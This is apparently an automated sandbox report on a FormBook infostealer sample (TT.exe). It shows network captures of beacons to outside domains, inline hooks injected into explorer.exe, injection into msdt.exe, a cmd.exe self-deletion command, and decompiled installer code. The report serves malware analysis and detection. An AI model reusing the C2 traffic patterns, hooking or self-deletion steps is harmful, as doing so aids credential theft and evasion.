                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.649735192.0.78.2480C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 4, 2021 15:42:50.273303986 CEST2229OUTGET /dxe/?oZN=7nbLudZHS&mdslXXV=s4725d3Oabb4GJPvvzs1NGtrQqdCSFbT14B5hiC+hEbCkkM6v8NMU0M9YHV7hr/JdwNsVvK8Ug== HTTP/1.1
                                              Host: www.philreid4cc.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 4, 2021 15:42:50.315778017 CEST2230INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Tue, 04 May 2021 13:42:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.philreid4cc.com/dxe/?oZN=7nbLudZHS&mdslXXV=s4725d3Oabb4GJPvvzs1NGtrQqdCSFbT14B5hiC+hEbCkkM6v8NMU0M9YHV7hr/JdwNsVvK8Ug==
                                              X-ac: 2.hhn _dfw
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.649741107.165.149.1380C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 4, 2021 15:43:10.927222013 CEST5159OUTGET /dxe/?mdslXXV=c1qXo+D3OeWS7aQwzsMJrh0J2W+ZcnXSIybZATOUAxrA4uZvd+OeJvPZ6sfOQ4L/XOcBlc02WQ==&oZN=7nbLudZHS HTTP/1.1
                                              Host: www.sectorulb.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.649749107.180.41.23680C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 4, 2021 15:43:34.155756950 CEST5189OUTGET /dxe/?oZN=7nbLudZHS&mdslXXV=pSmvUx3Cd9o2ehLRUYmTuUG+rz67XAZoYuLBzxOhEanl5TCXMyweO2X8MqC68oVFQcjckZtQvA== HTTP/1.1
                                              Host: www.lagrangewildliferemoval.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 4, 2021 15:43:34.301795006 CEST5190INHTTP/1.1 404 Not Found
                                              Date: Tue, 04 May 2021 13:43:34 GMT
                                              Server: Apache
                                              Content-Length: 315
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEE
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEE
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEE
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEE

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: TT.exe PID: 6588 Parent PID: 5940

                                              General

                                              Start time:15:41:44
                                              Start date:04/05/2021
                                              Path:C:\Users\user\Desktop\TT.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\TT.exe'
                                              Imagebase:0x400000
                                              File size:233940 bytes
                                              MD5 hash:27C863C479B0542B3BAD21A67AD1406D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.344692024.0000000003030000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.344692024.0000000003030000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.344692024.0000000003030000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: TT.exe PID: 6624 Parent PID: 6588

                                              General

                                              Start time:15:41:45
                                              Start date:04/05/2021
                                              Path:C:\Users\user\Desktop\TT.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\TT.exe'
                                              Imagebase:0x400000
                                              File size:233940 bytes
                                              MD5 hash:27C863C479B0542B3BAD21A67AD1406D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.393512483.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.393512483.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.393512483.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.392976261.00000000005E0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.392976261.00000000005E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.392976261.00000000005E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: explorer.exe PID: 3440 Parent PID: 6624

                                              General

                                              Start time:15:41:50
                                              Start date:04/05/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff6f22f0000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: msdt.exe PID: 7052 Parent PID: 3440

                                              General

                                              Start time:15:42:12
                                              Start date:04/05/2021
                                              Path:C:\Windows\SysWOW64\msdt.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\msdt.exe
                                              Imagebase:0xb20000
                                              File size:1508352 bytes
                                              MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.597417500.0000000002F90000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.597417500.0000000002F90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.597417500.0000000002F90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: cmd.exe PID: 6640 Parent PID: 7052

                                              General

                                              Start time:15:42:16
                                              Start date:04/05/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\TT.exe'
                                              Imagebase:0x2a0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 6312 Parent PID: 6640

                                              General

                                              Start time:15:42:16
                                              Start date:04/05/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff61de10000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: TT.exe PID: 6588 Parent PID: 5940 TT.exeCOMMON

                                                Executed Functions

                                                Function 00403461, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42474c = _t42;
				if(_t42 != 6) {
					_t119 = E00406631(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065C3(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406631(0xb);
				 *0x424744 = E00406631(9);
				_t47 = E00406631(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42474f =  *0x42474f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x424818 = _t47;
				SHGetFileInfoA(0x41fd10, 0, _t164 + 0x38, 0x160, 0); // executed
				E00406228(0x423f40, "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\engineer\\Desktop\\TT.exe\" ";
				E00406228(_t160, _t51);
				 *0x424740 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\engineer\\Desktop\\TT.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M0042A001;
				}
				_t55 = CharNextA(E00405BEB(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405BEB(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E00406228("C:\\Users\\engineer\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403430(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E00403949();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x4247f4;
													if( *0x4247f4 == 0) {
														L67:
														_t63 =  *0x42480c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406631(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405944( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x424760 == 0) {
												L42:
												 *0x42480c =  *0x42480c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A3B( *0x42480c);
												goto L43;
											}
											_t153 = E00405BEB(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058AF(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\engineer\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\engineer\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E00405892();
														} else {
															E00405815();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E00406228("C:\\Users\\engineer\\AppData\\Local\\Temp", _t162);
														}
														E00406228(0x425000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x425400 = "A";
														do {
															E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x120)));
															DeleteFileA(0x41f910);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\TT.exe", 0x41f910, 1) != 0) {
																E00406007(_t137, 0x41f910, 0);
																E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x124)));
																_t94 = E004058C7(0x41f910);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x425400 =  *0x425400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00406007(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CAE(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E00406228("C:\\Users\\engineer\\AppData\\Local\\Temp", _t154);
												E00406228("C:\\Users\\engineer\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403430(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403430(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x424800 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                0x00403471
                                                0x00403475
                                                0x0040347d
                                                0x00403481
                                                0x00403486
                                                0x00403492
                                                0x0040349b
                                                0x004034a0
                                                0x004034a3
                                                0x004034aa
                                                0x004034b1
                                                0x004034b1
                                                0x004034aa
                                                0x004034b3
                                                0x004034b8
                                                0x004034b9
                                                0x004034c5
                                                0x004034c9
                                                0x004034cf
                                                0x004034dd
                                                0x004034e2
                                                0x004034e9
                                                0x004034ed
                                                0x004034f1
                                                0x004034f3
                                                0x004034f3
                                                0x004034f1
                                                0x004034fb
                                                0x00403502
                                                0x00403508
                                                0x0040351e
                                                0x0040352e
                                                0x00403533
                                                0x00403539
                                                0x00403540
                                                0x0040354c
                                                0x00403556
                                                0x00403558
                                                0x0040355a
                                                0x0040355f
                                                0x0040355f
                                                0x0040356f
                                                0x00403575
                                                0x0040363e
                                                0x0040363e
                                                0x00403640
                                                0x00403642
                                                0x00000000
                                                0x00000000
                                                0x0040357e
                                                0x00403581
                                                0x00403589
                                                0x00403589
                                                0x0040358c
                                                0x00403591
                                                0x00403593
                                                0x00403593
                                                0x00403594
                                                0x00403594
                                                0x00403599
                                                0x0040359c
                                                0x0040362e
                                                0x00403633
                                                0x00403638
                                                0x0040363b
                                                0x0040363d
                                                0x0040363d
                                                0x0040363d
                                                0x00000000
                                                0x004035a2
                                                0x004035a2
                                                0x004035a3
                                                0x004035a6
                                                0x004035be
                                                0x004035e9
                                                0x004035eb
                                                0x004035fe
                                                0x00403629
                                                0x0040362c
                                                0x0040364a
                                                0x0040364d
                                                0x00403656
                                                0x0040365b
                                                0x00403661
                                                0x0040366c
                                                0x0040366e
                                                0x00403673
                                                0x00403675
                                                0x004036cd
                                                0x004036d2
                                                0x004036dc
                                                0x004036e3
                                                0x004036e7
                                                0x0040377b
                                                0x0040377b
                                                0x00403780
                                                0x00403786
                                                0x0040378b
                                                0x004038af
                                                0x004038b5
                                                0x00403931
                                                0x00403931
                                                0x00403936
                                                0x00403939
                                                0x0040393b
                                                0x0040393b
                                                0x00403943
                                                0x00403943
                                                0x004038c5
                                                0x004038cd
                                                0x004038cf
                                                0x004038d0
                                                0x004038dd
                                                0x004038f0
                                                0x004038f8
                                                0x004038fc
                                                0x004038fc
                                                0x00403904
                                                0x00403909
                                                0x00403910
                                                0x0040391e
                                                0x00403920
                                                0x00403926
                                                0x00403928
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403912
                                                0x00403918
                                                0x0040391a
                                                0x0040391c
                                                0x0040392a
                                                0x0040392c
                                                0x00000000
                                                0x0040392c
                                                0x00000000
                                                0x0040391c
                                                0x00403910
                                                0x0040379a
                                                0x004037a1
                                                0x004037a1
                                                0x004036f3
                                                0x0040376b
                                                0x0040376b
                                                0x00403777
                                                0x00000000
                                                0x00403777
                                                0x004036fc
                                                0x00403700
                                                0x00403736
                                                0x00403736
                                                0x00403738
                                                0x00403740
                                                0x004037b2
                                                0x004037b4
                                                0x004037bb
                                                0x004037c3
                                                0x004037c3
                                                0x004037ce
                                                0x004037d3
                                                0x004037e2
                                                0x004037e6
                                                0x004037e7
                                                0x004037f0
                                                0x004037e9
                                                0x004037e9
                                                0x004037e9
                                                0x004037f6
                                                0x004037fc
                                                0x00403802
                                                0x0040380a
                                                0x0040380a
                                                0x00403818
                                                0x0040381d
                                                0x0040382f
                                                0x00403837
                                                0x0040383d
                                                0x00403849
                                                0x0040384f
                                                0x00403859
                                                0x0040386f
                                                0x00403880
                                                0x00403886
                                                0x0040388d
                                                0x00403890
                                                0x00403896
                                                0x00403896
                                                0x0040388d
                                                0x0040389a
                                                0x004038a0
                                                0x004038a0
                                                0x004038a5
                                                0x004038a5
                                                0x00000000
                                                0x004037e2
                                                0x00403742
                                                0x00403744
                                                0x0040374f
                                                0x00000000
                                                0x00000000
                                                0x00403757
                                                0x00403762
                                                0x00403767
                                                0x00000000
                                                0x00403767
                                                0x0040372b
                                                0x0040372d
                                                0x00403731
                                                0x00403734
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403734
                                                0x00000000
                                                0x0040372d
                                                0x0040367d
                                                0x00403689
                                                0x0040368e
                                                0x00403693
                                                0x00403695
                                                0x00000000
                                                0x00000000
                                                0x0040369d
                                                0x004036a5
                                                0x004036b6
                                                0x004036be
                                                0x004036c0
                                                0x004036c5
                                                0x004036c7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036c7
                                                0x00000000
                                                0x0040362c
                                                0x004035ed
                                                0x004035f0
                                                0x004035f3
                                                0x004035f9
                                                0x004035f9
                                                0x004035f9
                                                0x004035f9
                                                0x00000000
                                                0x004035f9
                                                0x004035f5
                                                0x004035f7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004035f7
                                                0x004035a8
                                                0x004035ab
                                                0x004035ae
                                                0x004035b4
                                                0x004035b4
                                                0x00000000
                                                0x004035b4
                                                0x004035b0
                                                0x004035b2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004035b2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403583
                                                0x00403583
                                                0x00403583
                                                0x00403584
                                                0x00403584
                                                0x00000000
                                                0x00403583
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 00403486
                                                • GetVersion.KERNEL32 ref: 0040348C
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BF
                                                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004034FB
                                                • OleInitialize.OLE32(00000000), ref: 00403502
                                                • SHGetFileInfoA.SHELL32(0041FD10,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 0040351E
                                                • GetCommandLineA.KERNEL32(00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00403533
                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\TT.exe" ,00000020,"C:\Users\user\Desktop\TT.exe" ,00000000,?,00000007,00000009,0000000B), ref: 0040356F
                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 0040366C
                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040367D
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403689
                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040369D
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036A5
